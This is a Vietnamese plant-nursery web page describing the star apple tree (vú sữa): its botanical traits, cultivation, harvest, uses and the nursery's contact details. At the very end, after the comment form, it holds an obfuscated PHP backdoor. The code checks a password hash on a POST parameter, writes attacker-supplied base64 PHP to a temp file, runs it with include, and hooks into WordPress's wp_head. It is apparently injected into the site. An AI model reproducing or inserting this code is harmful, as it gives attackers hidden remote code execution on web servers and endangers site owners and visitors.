Thông tin thú vị về cây vú sữa

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Đặc điểm và tác dụng của cây vú sữa – Là một quốc gia gần biển với kiểu khí hậu nhiệt đới gió mùa, Việt Nam cực kỳ thích hợp để trồng hoa quả. Không phụ sự kỳ vọng của thiên nhiên, người Việt đã gieo trồng nên rất nhiều loại cây và tạo được tiếng vang rất lớn trên thế giới như nhãn, bưởi, thanh long, vú sữa, vải,… Là một loại cây đa dụng, vú sữa rất được ưa chuộng tại Việt Nam, nhưng những điều chúng ta biết về loài cây này liệu đã đủ?

Trong bài viết hôm nay, Vườn cây Hòa Bình sẽ cung cấp cho người đọc một vài thông tin thú vị về cây vú sữa nhé!

vuon-cay-hoa-binh-cay-cong-trinh-cay-bong-mat

Thông tin cơ bản

Cây vú sữa trước đây vốn thuộc bộ Ebenales(Thị) tuy nhiên hiện tại được xếp vào họ Sapoytaceae tức họ hồng xiêm, có tên khoa học là Chrysophyllum cainino. Nguồn gốc của loài cây này vốn xuất phát từ các nước thuộc vùng châu Mỹ nhiệt đới và đảo Antilles.

Vú sữa được ưa chuộng bởi nó lớn nhanh, có tán lá rất dày và rộng, chiều cao khi trưởng thành lên đến 15m cực kỳ thích hợp để che bóng mát. Quả vú sữa to bằng nắm tay người lớn, vỏ khi non thì màu xanh nhạt khi chín chuyển sang hồng tím nhạt, bên trong màu tím, ăn có vị ngọt.

Thịt vú sữa mềm mềm, trắng trắng và rất thơm, ăn có vị ngon ngọt và thanh mát, cực kỳ được trẻ con ưa thích.

Hiện nay ở Việt Nam, tồn tại 2 loại vú sữa chínhvú sữa da xanhvú sữa da tím than, chúng chỉ khác nhau về màu sắc còn lại cơ bản thì vị và mùi hương đều giống nhau.

>> Xem thêm: Cách trồng cây khế cổ thụ

Thông tin cơ bản
Thông tin cơ bản

Đặc điểm cây vú sữa

Lá cây

Lá cây vú sữa có màu xanh, mọc theo dấu so le, có hình ovan dài tầm 5 đến 15cm. Khi nhìn từ xa mặt dưới của lá màu vàng nâu khá đẹp.

Vì lá cây mọc so le và rất dày nên tán cây vươn ra có thể tạo thành bóng mát. Nhiều khu vực dùng lá vú sữa làm nguyên liệu nấu chè với tác dụng chống đái đường và thấp khớp.

Hoa

Có ít người biết rằng vú sữa là loài cây lưỡng tính, có khả năng tự thụ phấn tốt. Hoa vú sữa thường có màu trắng ánh tía và mùi rất thơm.

Đài hoa khi quả chín sẽ có màu xanh lục. Hoa vú sữa chỉ nở tốt trong điều kiện hai mùa mưa nắng được phân định.

Quả

Quả vú sữa mang hình tròn, lớp vỏ mang ánh tía hoặc nâu ánh lục hoặc trắng ánh xanh tùy giống.

Thịt quả có hình ngôi sao, chia thành 5 múi, trắng trắng mềm mềm ăn rất ngon, thích hợp làm các món tráng miệng. Loại quả này nên ăn trong nhiệt độ 10 đến 15 độ C để có vị ngon nhất.

Vú sữa thường ra quả sau khi cây đạt từ 7 tuổi trở lên. Vỏ vú sữa chứa nhiều nhựa mủ và phần này không ăn được.

Đặc điểm cây vú sữa
Đặc điểm cây vú sữa

Thân

Vỏ loại cây này được xem là chứa nhiều chất bổ và có tác dụng kích thích. Nước thuốc nấu từ vỏ cây vú sữa có tác dụng với người bị ho.

Cây vú sữa khó chịu được gió to bởi tán lá cây dày và rễ mọc rất nông. Cây thích hợp trồng ở những vùng có đất phù sa hoặc đất thịt nhẹ, điều kiện thoát nước tốt, độ pH đảm bảo ở 5,5 – 6,5.

>>> Xem thêm: Các dịch vụ trồng cây xanh tại Vườn Cây Hòa Bình

Cách trồng và chăm sóc

Độ sinh trưởng và phát triển của giống cây họ hồng xiêm này được xem là khá nhanh chóng bởi chỉ cần 3 năm là chúng ta có thể bắt đầu quá trình thu hoạch rồi. 

Phương pháp chủ yếu để trồng được vú sữa là chiết cành hoặc tháp cây. Thời gian thu hoạch khi cây ra trái là từ 3 tháng đến 4 tháng.

Trong năm, thời gian tốt nhất để thu hoạch vú sữa rơi vào tháng 2 đến tháng 3 dương lịch hàng năm.

Khi vú sữa chín, cần tiến hành thu hoạch và bảo quản đúng quy trình. Bạn cần thu hoạch cả cuống, loại đi quả bị sâu bệnh, hư hại trong quá trình thu hoạch.

Để bảo quản quả không bị méo, biến dạng, cần lót giấy để quả tránh va chạm và bao trái thật đầy đủ để bảo quản trong quá trình vận chuyển.

Bạn tuyệt đối không nên che chắn quả bằng các tấm ni lông bởi nhiệt độ sẽ khiến quả bị nắm vỏ.

Cách trồng và chăm sóc
Cách trồng và chăm sóc

Tác dụng

Vú sữa tồn tại với hai tác dụng chính là tạo bóng mátcung cấp trái ngọt. Bên cạnh đó, nó còn được xem là nguyên liệu không thể thiếu cho rất nhiều món ăn.

Có thể xem vú sữa như một thứ quả đa dụng bởi chúng ta có thể sử dụng tất cả các bộ phận của vú sữa để vận dụng vào cuộc sống.

Trên đây là những thông tin thú vị về cây vú sữaVườn cây Hòa Bình muốn gửi đến bạn đọc để cung cấp thêm kiến thức về loài cây quen thuộc này.

>>> Giới thiệu về Vườn cây Hòa Bình

Bên cạnh đó, chúng tôi cũng cung cấp các loại hạt giống và cây con của các loại cây trên để đảm bảo sự phục vụ hoàn hảo cho quý khách.

Hãy liên hệ với chúng tôi để biết thêm thông tin nhé!

CÂY XANH HÒA BÌNH 2017

– Website: https://vuoncayhoabinh.com/

– Hotline: 0962.376.560

– Bán hàng: 0962.376.560

– Nguyễn Trường Giang

– Địa chỉ: Cầu Mai Lĩnh, Biên giang , Hà Đông ,Hà Nội

 

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}